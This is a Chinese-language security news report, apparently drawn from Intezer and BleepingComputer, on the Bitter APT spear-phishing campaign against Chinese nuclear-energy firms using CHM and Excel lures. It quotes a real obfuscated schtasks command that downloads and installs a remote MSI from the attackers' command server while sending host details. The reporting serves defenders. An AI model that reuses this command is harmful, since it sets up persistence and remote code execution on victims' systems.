最近发现一个被追踪为“Bitter APT”的网络间谍黑客组织以我国核能行业为目标,使用网络钓鱼电子邮件感染带有恶意软件下载程序的设备。
Bitter 是一个疑似南亚黑客组织,以亚太地区能源、工程和政府部门的知名组织为目标。
2022 年 5 月,Bitter APT 被发现使用带有恶意 XLSX 文档附件的鱼叉式网络钓鱼电子邮件 在东南亚的目标上加载名为“ZxxZ”的木马。
2022 年 8 月,Meta 报告称,Bitter APT 正在 使用一种名为“Dracarys”的新 Android 间谍软件工具 来攻击新西兰、印度、巴基斯坦和英国的用户。
Intezer 的威胁分析师发现了这次黑客活动,他们根据观察到的 TTP(策略、技术和程序)将其归因于 Bitter APT,这些 TTP 与同一威胁参与者过去的活动相匹配。
在Intezer发现的新活动中,Bitter 伪装成吉尔吉斯斯坦驻北京大使馆向与该领域相关的多家我国核能公司和学者发送电子邮件。
这封电子邮件假装是邀请参加一场据称由吉尔吉斯大使馆、国际原子能机构 (IAEA) 和我国国际问题研究院 (CIIS) 举办的核能会议。
电子邮件上签名的名字是真实的,属于吉尔吉斯斯坦外交部的一名官员,表明 Bitter APT 对有助于增加其通信合法性的细节的关注。
敦促收件人下载电子邮件的 RAR 附件,该附件据称包含会议邀请卡,但实际上包含 Microsoft 编译的 HTML 帮助文件 (CHM) 或恶意 Excel 文档。
在大多数情况下,Bitter APT 使用 CHM 有效负载执行命令以在受感染系统上创建计划任务并下载下一阶段。
当 Excel 文档隐藏在下载的 RAR 附件中时,计划任务是通过利用打开恶意文档触发的较旧的公式编辑器漏洞来添加的。
Intezer 评论说,威胁行为者可能更喜欢 CHM 有效载荷,因为它们不需要目标使用易受攻击的 Microsoft Office 版本,由于其 LZX 压缩,可以绕过静态分析,并且需要最少的用户交互来操作。
如果使用 CHM 有效载荷,则第二阶段有效载荷是 MSI 或PowerShell 文件,如果使用 Excel 文档有效载荷,则第二阶段有效载荷是 EXE 文件。
为了逃避检测和暴露,第二阶段的有效载荷是空的。然而,当第一阶段的有效载荷将有关被破坏设备的信息发送到攻击者的命令和控制服务器时,它将确定它是否是一个有价值的目标并将实际的恶意软件传递到受感染的系统。
Intezer 的分析师无法检索到此活动中交付的任何实际有效负载,但假设它们可能包括键盘记录器、RAT(远程访问工具)和信息窃取器。
如果目标看起来足够有希望,这可能允许攻击者在决定是否用实际有效载荷换出空文件之前检查受感染机器的服务器日志,从而保护下一阶段的攻击。Bitter APT 似乎并没有太多改变他们的策略,因此我们可以假设有效负载将与2021 年观察到的类似,执行一个下载器模块,该模块可以与键盘记录器、远程访问工具、文件窃取器等插件一起使用,或浏览器凭据窃取程序。
CHM 有效负载的第二个版本通过编码的 PowerShell 命令阶段抽象出相同的活动,进一步混淆活动,而不仅仅是简单的字符串连接。
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 15 /tn AdobeUpdater /tr "%coMSPec% /c s^t^a^rt /^m^i^n m^s^i^e^xe^c ^/^i htt^p:/^/mirz^adih^atti^[.]com^/cs^s/t^ry.php?h=%computername%*%username% /^q^n ^/^norestart" /ft
很明显,C2 控制器也已更新,因为现在只有计算机名称被发送到 C2,而不是用户名。下一个版本的有趣之处在于它现在在打开时包含一张诱饵图片:
CHM 文件曾经流行用于软件文档和帮助文件,但现在已不再常用,更不用说在电子邮件通信中了。
电子邮件的收件人在遇到附件存档中的 CHM 文件时应提高警惕,因为这些文件可能包含恶意内容。
最后,档案本身也应该受到怀疑,因为它们可以绕过反病毒扫描,因此它们是恶意的可能性很高。
其它阅读参考:
https://www.bleepingcomputer.com/news/security/bitter-cyberspies-target-south-asian-govts-with-new-malware/
https://www.bleepingcomputer.com/news/security/bitter-espionage-hackers-target-chinese-nuclear-energy-orgs/
https://www.intezer.com/blog/research/phishing-campaign-targets-nuclear-energy-industry/